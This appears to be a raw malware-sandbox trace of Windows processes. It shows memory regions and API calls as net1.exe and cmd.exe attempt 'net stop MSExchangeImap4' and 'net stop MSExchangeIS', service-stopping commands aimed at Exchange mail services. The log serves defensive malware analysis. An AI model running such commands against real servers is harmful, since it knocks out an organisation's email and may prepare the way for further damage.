mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10403 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10404 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10405 start_va = 0x7e9a0000 end_va = 0x7ea9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9a0000" filename = "" Region: id = 10406 start_va = 0x7eac9000 end_va = 0x7eacbfff entry_point = 0x0 region_type = private name = "private_0x000000007eac9000" filename = "" Region: id = 10407 start_va = 0x440000 end_va = 0x443fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 10408 start_va = 0x5a0000 end_va = 0x5a2fff entry_point = 0x5a0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 10409 start_va = 0x6a0000 end_va = 0x6d1fff entry_point = 0x6a0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 639 os_tid = 0xe20 [0136.756] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0136.756] __set_app_type (_Type=0x1) [0136.756] __p__fmode () returned 0x77ac4d6c [0136.756] __p__commode () returned 0x77ac5b1c [0136.756] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0136.756] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0136.756] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.756] GetConsoleOutputCP () returned 0x1b5 [0136.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0136.756] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.758] sprintf_s (in: _DstBuf=0x52fc78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0136.758] setlocale (category=0, locale=".437") returned="English_United States.437" [0136.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0136.759] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0136.759] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeImap4" [0136.760] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x52fa20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0136.760] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x52fa14 | out: Buffer=0x52fa14*=0x6e7f10) returned 0x0 [0136.760] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x52fa18 | out: Buffer=0x52fa18*=0x6e7ee0) returned 0x0 [0136.760] __iob_func () returned 0x77ac1208 [0136.760] _fileno (_File=0x77ac1208) returned 0 [0136.760] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0136.760] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0136.760] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0136.760] _wcsicmp (_String1="config", _String2="stop") returned -16 [0136.760] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0136.760] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0136.760] _wcsicmp (_String1="file", _String2="stop") returned -13 [0136.760] _wcsicmp (_String1="files", _String2="stop") returned -13 [0136.760] _wcsicmp (_String1="group", _String2="stop") returned -12 [0136.760] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0136.760] _wcsicmp (_String1="help", _String2="stop") returned -11 [0136.760] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0136.760] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0136.760] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0136.760] _wcsicmp (_String1="session", _String2="stop") returned -15 [0136.760] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0136.760] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0136.760] _wcsicmp (_String1="share", _String2="stop") returned -12 [0136.760] _wcsicmp (_String1="start", _String2="stop") returned -14 [0136.760] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0136.760] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0136.760] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0136.760] _wcsicmp (_String1="accounts", _String2="MSExchangeImap4") returned -12 [0136.760] _wcsicmp (_String1="computer", _String2="MSExchangeImap4") returned -10 [0136.760] _wcsicmp (_String1="config", _String2="MSExchangeImap4") returned -10 [0136.760] _wcsicmp (_String1="continue", _String2="MSExchangeImap4") returned -10 [0136.760] _wcsicmp (_String1="cont", _String2="MSExchangeImap4") returned -10 [0136.760] _wcsicmp (_String1="file", _String2="MSExchangeImap4") returned -7 [0136.760] _wcsicmp (_String1="files", _String2="MSExchangeImap4") returned -7 [0136.760] _wcsicmp (_String1="group", _String2="MSExchangeImap4") returned -6 [0136.760] _wcsicmp (_String1="groups", _String2="MSExchangeImap4") returned -6 [0136.760] _wcsicmp (_String1="help", _String2="MSExchangeImap4") returned -5 [0136.760] _wcsicmp (_String1="helpmsg", _String2="MSExchangeImap4") returned -5 [0136.760] _wcsicmp (_String1="localgroup", _String2="MSExchangeImap4") returned -1 [0136.760] _wcsicmp (_String1="pause", _String2="MSExchangeImap4") returned 3 [0136.760] _wcsicmp (_String1="session", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="sessions", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="sess", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="share", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="start", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="stats", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="statistics", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="stop", _String2="MSExchangeImap4") returned 6 [0136.760] _wcsicmp (_String1="time", _String2="MSExchangeImap4") returned 7 [0136.760] _wcsicmp (_String1="user", _String2="MSExchangeImap4") returned 8 [0136.760] _wcsicmp (_String1="users", _String2="MSExchangeImap4") returned 8 [0136.760] _wcsicmp (_String1="msg", _String2="MSExchangeImap4") returned 2 [0136.761] _wcsicmp (_String1="messenger", _String2="MSExchangeImap4") returned -14 [0136.761] _wcsicmp (_String1="receiver", _String2="MSExchangeImap4") returned 5 [0136.761] _wcsicmp (_String1="rcv", _String2="MSExchangeImap4") returned 5 [0136.761] _wcsicmp (_String1="netpopup", _String2="MSExchangeImap4") returned 1 [0136.761] _wcsicmp (_String1="redirector", _String2="MSExchangeImap4") returned 5 [0136.761] _wcsicmp (_String1="redir", _String2="MSExchangeImap4") returned 5 [0136.761] _wcsicmp (_String1="rdr", _String2="MSExchangeImap4") returned 5 [0136.761] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeImap4") returned 10 [0136.761] _wcsicmp (_String1="work", _String2="MSExchangeImap4") returned 10 [0136.761] _wcsicmp (_String1="wksta", _String2="MSExchangeImap4") returned 10 [0136.761] _wcsicmp (_String1="prdr", _String2="MSExchangeImap4") returned 3 [0136.761] _wcsicmp (_String1="devrdr", _String2="MSExchangeImap4") returned -9 [0136.761] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeImap4") returned -1 [0136.761] _wcsicmp (_String1="server", _String2="MSExchangeImap4") returned 6 [0136.761] _wcsicmp (_String1="svr", _String2="MSExchangeImap4") returned 6 [0136.761] _wcsicmp (_String1="srv", _String2="MSExchangeImap4") returned 6 [0136.761] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeImap4") returned -1 [0136.761] _wcsicmp (_String1="alerter", _String2="MSExchangeImap4") returned -12 [0136.761] _wcsicmp (_String1="netlogon", _String2="MSExchangeImap4") returned 1 [0136.761] _wcsupr (in: _String="MSExchangeImap4" | out: _String="MSEXCHANGEIMAP4") returned="MSEXCHANGEIMAP4" [0136.761] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6e2638 [0136.763] GetServiceKeyNameW (in: hSCManager=0x6e2638, lpDisplayName="MSEXCHANGEIMAP4", lpServiceName=0x10a8cb0, lpcchBuffer=0x52f98c | out: lpServiceName="", lpcchBuffer=0x52f98c) returned 0 [0136.763] _wcsicmp (_String1="msg", _String2="MSEXCHANGEIMAP4") returned 2 [0136.763] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEIMAP4") returned -14 [0136.763] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEIMAP4") returned 5 [0136.763] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEIMAP4") returned 5 [0136.763] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEIMAP4") returned 5 [0136.763] _wcsicmp (_String1="redir", _String2="MSEXCHANGEIMAP4") returned 5 [0136.763] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEIMAP4") returned 5 [0136.763] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEIMAP4") returned 10 [0136.763] _wcsicmp (_String1="work", _String2="MSEXCHANGEIMAP4") returned 10 [0136.763] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEIMAP4") returned 10 [0136.763] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEIMAP4") returned 3 [0136.763] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEIMAP4") returned -9 [0136.763] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEIMAP4") returned -1 [0136.763] _wcsicmp (_String1="server", _String2="MSEXCHANGEIMAP4") returned 6 [0136.763] _wcsicmp (_String1="svr", _String2="MSEXCHANGEIMAP4") returned 6 [0136.763] _wcsicmp (_String1="srv", _String2="MSEXCHANGEIMAP4") returned 6 [0136.763] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEIMAP4") returned -1 [0136.763] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEIMAP4") returned -12 [0136.764] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEIMAP4") returned 1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="WORKSTATION") returned -10 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="LanmanWorkstation") returned 1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="SERVER") returned -6 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="LanmanServer") returned 1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="BROWSER") returned 11 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="BROWSER") returned 11 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="MESSENGER") returned 14 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="MESSENGER") returned 14 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="NETRUN") returned -1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="NETRUN") returned -1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="SPOOLER") returned -6 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="SPOOLER") returned -6 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="ALERTER") returned 12 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="ALERTER") returned 12 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="NETLOGON") returned -1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="NETLOGON") returned -1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="NETPOPUP") returned -1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="NETPOPUP") returned -1 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="SQLSERVER") returned -6 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="SQLSERVER") returned -6 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="REPLICATOR") returned -5 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="REPLICATOR") returned -5 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="REMOTEBOOT") returned -5 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="REMOTEBOOT") returned -5 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="TIMESOURCE") returned -7 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="TIMESOURCE") returned -7 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="AFP") returned 12 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="AFP") returned 12 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="UPS") returned -8 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="UPS") returned -8 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="XACTSRV") returned -11 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="XACTSRV") returned -11 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="TCPIP") returned -7 [0136.764] _wcsicmp (_String1="MSEXCHANGEIMAP4", _String2="TCPIP") returned -7 [0136.764] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6e3760 [0136.764] OpenServiceW (hSCManager=0x6e3760, lpServiceName="MSEXCHANGEIMAP4", dwDesiredAccess=0x84) returned 0x0 [0136.765] GetLastError () returned 0x424 [0136.765] CloseServiceHandle (hSCObject=0x6e3760) returned 1 [0136.765] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0136.765] LoadLibraryW (lpLibFileName="NETMSG") returned 0x5a0000 [0136.765] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x5a0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0136.766] GetFileType (hFile=0x40) returned 0x2 [0136.766] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x52f828 | out: lpMode=0x52f828) returned 1 [0136.767] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x52f834, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x52f834*=0x1e) returned 1 [0136.767] GetFileType (hFile=0x40) returned 0x2 [0136.767] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x52f828 | out: lpMode=0x52f828) returned 1 [0136.767] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x52f834, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x52f834*=0x2) returned 1 [0136.767] _ultow (in: _Dest=0x889, _Radix=5437512 | out: _Dest=0x889) returned="2185" [0136.767] FormatMessageW (in: dwFlags=0x2800, lpSource=0x5a0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0136.767] GetFileType (hFile=0x40) returned 0x2 [0136.767] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x52f818 | out: lpMode=0x52f818) returned 1 [0136.768] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x52f824, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x52f824*=0x34) returned 1 [0136.768] GetFileType (hFile=0x40) returned 0x2 [0136.768] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x52f818 | out: lpMode=0x52f818) returned 1 [0136.768] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x52f824, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x52f824*=0x2) returned 1 [0136.768] NetApiBufferFree (Buffer=0x6e7f10) returned 0x0 [0136.768] NetApiBufferFree (Buffer=0x6e7ee0) returned 0x0 [0136.768] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeImap4" [0136.768] exit (_Code=2) Thread: id = 640 os_tid = 0xf3c Process: id = "209" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6ed84000" os_pid = "0xe34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeIS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10410 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10411 start_va = 0x8f0000 end_va = 0x48effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 10412 start_va = 0x48f0000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 10413 start_va = 0x4910000 end_va = 0x4910fff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 10414 start_va = 0x4920000 end_va = 0x4933fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004920000" filename = "" Region: id = 10415 start_va = 0x4940000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 10416 start_va = 0x4980000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 10417 start_va = 0x4a80000 end_va = 0x4a83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a80000" filename = "" Region: id = 10418 start_va = 0x4a90000 end_va = 0x4a90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a90000" filename = "" Region: id = 10419 start_va = 0x4aa0000 end_va = 0x4aa1fff entry_point = 0x0 region_type = private name = "private_0x0000000004aa0000" filename = "" Region: id = 10420 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10421 start_va = 0x7f1d0000 end_va = 0x7f1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1d0000" filename = "" Region: id = 10422 start_va = 0x7f1f5000 end_va = 0x7f1f5fff entry_point = 0x0 region_type = private name = "private_0x000000007f1f5000" filename = "" Region: id = 10423 start_va = 0x7f1fb000 end_va = 0x7f1fbfff entry_point = 0x0 region_type = private name = "private_0x000000007f1fb000" filename = "" Region: id = 10424 start_va = 0x7f1fd000 end_va = 0x7f1fffff entry_point = 0x0 region_type = private name = "private_0x000000007f1fd000" filename = "" Region: id = 10425 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10426 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10427 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10428 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10429 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10430 start_va = 0x4b50000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 10431 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10432 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10433 start_va = 0x4c90000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 10434 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10475 start_va = 0x48f0000 end_va = 0x48fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048f0000" filename = "" Region: id = 10476 start_va = 0x4ab0000 end_va = 0x4aeffff entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 10477 start_va = 0x4b60000 end_va = 0x4c1dfff entry_point = 0x4b60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10478 start_va = 0x4d90000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 10479 start_va = 0x4fc0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 10480 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10481 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10482 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10483 start_va = 0x7f0d0000 end_va = 0x7f1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0d0000" filename = "" Region: id = 10484 start_va = 0x7f1f8000 end_va = 0x7f1fafff entry_point = 0x0 region_type = private name = "private_0x000000007f1f8000" filename = "" Region: id = 10485 start_va = 0x4900000 end_va = 0x4903fff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 10486 start_va = 0x4910000 end_va = 0x4913fff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 10487 start_va = 0x4fd0000 end_va = 0x5306fff entry_point = 0x4fd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 641 os_tid = 0xf48 [0136.929] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0136.929] __set_app_type (_Type=0x1) [0136.929] __p__fmode () returned 0x77ac4d6c [0136.929] __p__commode () returned 0x77ac5b1c [0136.929] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0136.929] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0136.929] GetCurrentThreadId () returned 0xf48 [0136.929] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf48) returned 0x84 [0136.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0136.929] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0136.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.932] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.932] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4a7fe50 | out: phkResult=0x4a7fe50*=0x0) returned 0x2 [0136.932] VirtualQuery (in: lpAddress=0x4a7fe57, lpBuffer=0x4a7fe08, dwLength=0x1c | out: lpBuffer=0x4a7fe08*(BaseAddress=0x4a7f000, AllocationBase=0x4980000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.932] VirtualQuery (in: lpAddress=0x4980000, lpBuffer=0x4a7fe08, dwLength=0x1c | out: lpBuffer=0x4a7fe08*(BaseAddress=0x4980000, AllocationBase=0x4980000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.932] VirtualQuery (in: lpAddress=0x4981000, lpBuffer=0x4a7fe08, dwLength=0x1c | out: lpBuffer=0x4a7fe08*(BaseAddress=0x4981000, AllocationBase=0x4980000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.932] VirtualQuery (in: lpAddress=0x4983000, lpBuffer=0x4a7fe08, dwLength=0x1c | out: lpBuffer=0x4a7fe08*(BaseAddress=0x4983000, AllocationBase=0x4980000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.932] VirtualQuery (in: lpAddress=0x4a80000, lpBuffer=0x4a7fe08, dwLength=0x1c | out: lpBuffer=0x4a7fe08*(BaseAddress=0x4a80000, AllocationBase=0x4a80000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.932] GetConsoleOutputCP () returned 0x1b5 [0136.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.932] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0136.932] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.933] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0136.933] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.933] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0136.933] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.933] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0136.933] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.933] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0136.933] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.933] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0136.933] GetEnvironmentStringsW () returned 0x4c97d60* [0136.934] FreeEnvironmentStringsA (penv="A") returned 1 [0136.934] GetEnvironmentStringsW () returned 0x4c97d60* [0136.934] FreeEnvironmentStringsA (penv="A") returned 1 [0136.934] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a7edb4 | out: phkResult=0x4a7edb4*=0x94) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x0, lpData=0x4a7edc0*=0xb0, lpcbData=0x4a7edbc*=0x1000) returned 0x2 [0136.934] 